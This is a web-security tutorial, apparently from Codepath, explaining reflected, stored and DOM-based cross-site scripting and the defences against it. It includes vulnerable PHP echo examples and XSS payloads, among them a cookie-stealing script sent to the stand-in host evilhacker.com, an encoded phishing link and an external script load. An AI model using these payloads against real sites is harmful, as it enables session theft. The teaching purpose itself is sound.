Codepath

Cross Site Scripting

Cross-Site Scripting becomes possible when code puts user-supplied data in the response without sanitizing the data first. It gets its name because an attacker is able to run JavaScripts on someone else's site. Cross-Site Scripting is often abbreviated as "XSS".

It is ranked as #3 on Top 10 security threats by OWASP, and is the most common web application security flaw.

There are numerous ways that a hacker can provide JavaScript to a page. It depends on what incoming data is being output again without being properly sanitized. Once the hacker gets their JavaScript in the page response, the script will execute, usually for an unsuspecting user. The script can perform any number of actions, including stealing site cookies or session data. It succeeds because the browser believes that all JavaScript provided with the page is trustworthy.


Types of XSS

There are three types of Cross-Site Scripting.

  • Reflected

    • Data from URLs or forms
    • Runs immediately when data is received
  • Stored

    • Data from database, cookies, and sessions
    • Runs later when data is retrieved
  • DOM-based

    • Data generated by JavaScript
    • Runs when user triggers JavaScript events

Reflected XSS

Reflected XSS is when the script runs immediately in the victim's browser. The JavaScript being run would be included in the URL data or form data. It is called "reflected" because it bounces right back. In a well-designed attack, the user will not even notice that the script has run.

As an example, imagine a search box at the top of a website. When a user submits a search term, the application searches the database for products matching that term. If no products are found, it responds with:

<h1>No results were found for: <?php echo $term; ?></h1>

If the search request was:

GET /search.php?term=candy

The application would return:

<h1>No results were found for: candy</h1>

Notice that the data being submitted in the URL query is not being sanitized to remove or disable JavaScript before it is output to HTML.

A malicious request like:

GET /search.php?term=<script>alert('XSS!');</script>

Would output this code in the HTML sent to the browser:

<h1>No results were found for: <script>alert('XSS!');</script></h1>

Sending a simple JavaScript alert, like the one above, is one of the easiest ways to test for XSS vulnerabilities. However, it is important to realize that the JavaScript code between the script tags could be anything.


XSS using an HTML attribute

Here is another example using a login form. Notice that the username text input will be populated by the value of $username if available. If a login attempt fails, then the submitted username will reappear in the form so the user can try again with a new password.

<!-- login.php -->
<input type="text" name="username" value="<?php echo $username; ?>" /><br />
<input type="password" name="password" value="" />

A hacker enters the following username and password and submits the form.

username: " /><script>alert('XSS!');</script>
password:

The login will fail and the form will be shown again with the hacker's code inserted.

<!-- login.php -->
<input type="text" name="username" value="" /><script>alert('XSS!');</script>" />
<input type="password" name="password" value="" />

Notice that the malicious string closes the double-quotes and input tag to break out of the HTML tag attribute. This allows the script tags to be put in the HTML body and be executed. It does not matter very much where dynamic data is inserted on the HTML page, some version of a string can be crafted to make the script execute.


XSS encoded scripts in URLs

It is also possible to put scripts in URL strings provided that they are properly URL encoded. This is a powerful attack because other users can be tricked into clicking on the links using baiting or phishing techniques.

Imagine that the login form in the previous example also allows pre-populating the username based on a query string value.

GET /login.php?username=superstudent

A hacker could exploit it with an encoded script in the URL of a link.

<a href=" http://foo.com/login.php?username=%22+%2F%3E%3Cscript%3Ealert%28%27XSS%21%27%29%3B%3C%2Fscript%3E">
  Click here for free money!
</a>

PHP automatically decodes URL query strings, and the content would be inserted in the value attribute of the text input. The result would be the same as the previous example.

<!-- login.php -->
<input type="text" name="username" value="" /><script>alert('XSS!');</script>" />
<input type="password" name="password" value="" />

The difference is that this time it not the hacker who is triggering the XSS attack. It is another user who unsuspectingly clicked on a link. If that user is currently logged into a website, then the script can take advantage of their privileged access and view information or take actions a "logged out script" could not. It also allows the script to access the user's browser cookies for the current website.


XSS Cookie Theft

One of the most common targets for XSS attacks are user cookies. Cookies are data stored in the user's browser by a website. They are stored on a per-domain basis, so that a website only has access to cookies it set itself.

In XSS, JavaScript is embedded in the response coming from the website, so the browser views it as trustworthy code from the current domain and gives access to the website's previously stored cookies. In JavaScript, accesses cookie data is as simple as calling document.cookie.

In this example, the JavaScript accesses the cookie data and sends it as a string to a URL on another server.

GET /login.php?username=" /><script>document.location= 'http://evilhacker.com?stolen_cookie='+document.cookie;</script>

The code above is shown unencoded for readability. Encoded in a link, it would look like:

<a href=" http://foo.com/login.php?username=%22+%2F%3E%3Cscript%3Edocument.location%3D+%27http%3A%2F%2Fevilhacker.com%3Fstolen_cookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E">
  Click here for free money!
</a>

XSS with External JavaScript

The JavaScript "payload" does not have to be simple or visible. It is just as easy to load an external JavaScript as to provide inline code. This JavaScript page can be long and complex.

GET /login.php?username=<script src="http://evilhacker.com/bad.js"></script>

Stored XSS

Stored Cross-Site Scripting is when the data is not output to a response immediately, but is instead stored to be displayed later. It is like planting a XSS landmine in the application data. It could be stored in the database, in cookie or session data, or even in a file. When the data is retrieved and viewed, if not properly sanitized, it will execute the script. This is also sometimes referred to as "Blind XSS".

Stored XSS is effective because applications regularly read from data storage and often from unexpected avenues. For example, a user table in a database might not just be accessed via the public-facing website, but also by administrator tools, log review applications, and code for data analytics. Any of these avenues could be vulnerable and often they are less guarded because knowledge about Stored XSS is lower or the data may be presumed to have been sanitized already. Often these "back-office" tools are closed-source and written by third-parties which may have lower security knowledge.

Matthew Bryant has a good write up of the technique and how he found an XSS vulernability at GoDaddy on his blog. He had actually forgotten that he had submitted the XSS. Later, when he called customer service with a real question, the Stored XSS was triggered.


DOM-based XSS

It has become common for modern web applications to handle much of the user interaction on the client-side using JavaScript. Instead of sending a request to the server, the page already has the code necessary to respond to an action.

DOM-based XSS embeds the attack script into the existing page. In HTML, the current page is known as the "DOM", short for "document object model". DOM-based XSS is similar to Reflected XSS because it runs immediately, but the response is not coming from the server. It is being triggered by JavaScript events.

For an example, imagine a webpage which lists 100 restaurants. At the top of the list is a text input field which allows live filtering of the results based on the user's entry. An attacker could enter a carefully-crafted string in the box, the page's JavaScript would process the string without first sanitizing it, and the malicious script would execute. It would all take place on the existing page, using existing code. The page would not reload and a request would not be sent to the server.


XSS Preventions

Mapping data passageways and exposures helps to determine where data is input, transferred, stored, and output. This will identify the areas of concern for XSS prevention.

The first defense in preventing XSS is to validate and sanitize incoming data. Use whitelists of allowed characters and validate that data matches expected input. Use a well-tested library for sanitization, because there are many tricks to bypass detection and it can be challenging to plan for them all.

The second defense is sanitizing all data before output, even if the data has been previously sanitized. The correct sanitizing technique depends on the output destination. There are five primary output types to monitor.

Destination Example usage
HTML content
  • $user_input
  • HTML attribute
    JavaScript var name='$user_input';
    CSS properties color: $user_input;
    URL http://abc.com?q=$user_input

    HTTPOnly cookies

    A good defense against XSS cookie theft is to turn off JavaScript's access to cookies. This is done by setting a HTTPOnly flag on cookies. In PHP, it can be enabled on a per-cookie basis as an option to the setcookie() function, and can be enable for sessions in the php.ini file. (See cookie and session options)


    Content Security Policy (CSP)

    Defining a Content Security Policy can prevent the loading of external JavaScripts. CSPs allow regulating the loading of external resources.


    OWASP Cross Site Scripting Prevention

    OWASP XSS Filter Evasion Cheat Sheet

    Fork me on GitHub